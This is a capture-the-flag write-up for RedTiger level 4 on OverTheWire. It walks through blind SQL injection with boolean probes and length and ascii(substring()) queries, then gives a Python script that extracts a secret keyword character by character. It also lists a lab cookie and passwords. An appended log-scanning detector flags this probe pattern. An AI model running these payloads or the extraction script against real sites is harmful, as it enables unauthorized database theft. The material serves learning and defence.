Level 4

References

Writeup

  • SQLi identification: Boolean-based blind SQL injection
    • and 1=1:
      http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=1
      Query returned 1 rows.
      
    • and 1=2:
      http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=2
      Query returned 0 rows.
      
  • Blind-injection length determination:
    • length(keyword)>20 holds:
      union select keyword, 1 
      from level4_secret 
      where length(keyword)>20
      
      Query returned 2 rows.
      
    • length(keyword)>25 does not hold:
      union select keyword, 1 
      from level4_secret 
      where length(keyword)>25
      
      Query returned 1 rows.
      
    • In the end the length turns out to be 21:
      union select keyword, 1 
      from level4_secret 
      where length(keyword)=21
      
      Query returned 2 rows.
      
  • Character determination: (a~z, 0~9)
    union select keyword, 1
    from level4_secret 
    where ascii(substring(keyword,1,1))= 97
    
    union select keyword, 1
    from level4_secret 
    where ascii(substring(keyword,1,1))= 98
    
    ...
    union select keyword, 1
    from level4_secret 
    where ascii(substring(keyword,21,1))= 57
    
  • script:

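    #!/usr/bin/env python3
    # encoding: utf-8
    
    import requests
    
    s = requests.session()
    
    # Candidate characters tested at each position (a~z, 0~9)
    charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
    headers = {'Cookie': 'level4login=there_is_no_bug'}
    result = ''
    
    # The keyword length is 21, so positions 1..21 are tested.
    # A position whose character is outside charset adds nothing to result.
    for x in range(1, 22):
        for c in charset:
            url = "http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword, 1 from level4_secret where ascii(substring(keyword,%i,1))= %i" % (x, ord(c))
            r = s.get(url, headers=headers)
            # "2 rows" means the injected condition is true for this character
            if "2 rows" in r.text:
                print(c)
                result += c
                break
    
    print(result)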
    
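  • The final keyword is killstickswithbr1cks
  • However, this keyword does not clear the level on the site. The result I got also differs from other writeups (blindinjection123), which does not clear the level either. It feels like the keyword has been changed, and the level 5 password has changed too: logging in with bananas_are_not_yellow-sometimes does not work.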
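
Seen from the server side, the extraction above leaves a distinctive trail: one client sending many requests whose `id` parameter differs only in the position and ASCII code inside `ascii(substring(...))`. The following is an added example, not part of the original writeup, that flags this pattern in access logs; the log line format, the client addresses, the `min_probes` threshold and the names `scan`, `PROBE` and `LENGTH` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (client, request line); not real traffic.
BASE = "/level4.php?id=1%20union%20select%20keyword,%201%20from%20level4_secret%20where%20"
SAMPLE_LOG = [
    '198.51.100.7 "GET /level4.php?id=1 HTTP/1.1"',
    '203.0.113.9 "GET /level4.php?id=1%20and%201=1 HTTP/1.1"',
    f'203.0.113.9 "GET {BASE}length(keyword)%3E20 HTTP/1.1"',
] + [
    f'203.0.113.9 "GET {BASE}ascii(substring(keyword,{p},1))=%20{v} HTTP/1.1"'
    for p in (1, 2) for v in range(97, 103)
]

LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+"$')
# Single-character comparison: ascii(substring(col, pos, 1)) = code, plus common variants
PROBE = re.compile(
    r"(?:ascii|ord)\s*\(\s*(?:substring|substr|mid)\s*\(\s*[\w.]+\s*,"
    r"\s*(\d+)\s*,\s*1\s*\)\s*\)\s*[=<>]+\s*(\d+)", re.I)
# Length comparison such as length(keyword)>20
LENGTH = re.compile(r"length\s*\(\s*[\w.]+\s*\)\s*[=<>]+\s*\d+", re.I)

def scan(lines, min_probes=5):
    """Return {client: summary} for clients whose parameters look like blind extraction."""
    probes = defaultdict(set)          # client -> {(position, ascii code)}
    length_checks = defaultdict(int)   # client -> number of length() comparisons
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                   # skip lines that are not in the assumed format
        client, target = m.groups()
        # parse_qs URL-decodes the values, so %20 and %3E are matched as ' ' and '>'
        for values in parse_qs(urlsplit(target).query).values():
            for value in values:
                for pos, code in PROBE.findall(value):
                    probes[client].add((int(pos), int(code)))
                length_checks[client] += len(LENGTH.findall(value))
    return {
        client: {"probes": len(seen),
                 "positions": sorted({p for p, _ in seen}),
                 "length_checks": length_checks[client]}
        for client, seen in probes.items() if len(seen) >= min_probes
    }

if __name__ == "__main__":
    for client, summary in scan(SAMPLE_LOG).items():
        print(client, summary)
```

Counting distinct (position, code) pairs rather than raw requests keeps a single crafted request from triggering the alert, while a character-by-character scan crosses the threshold quickly.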
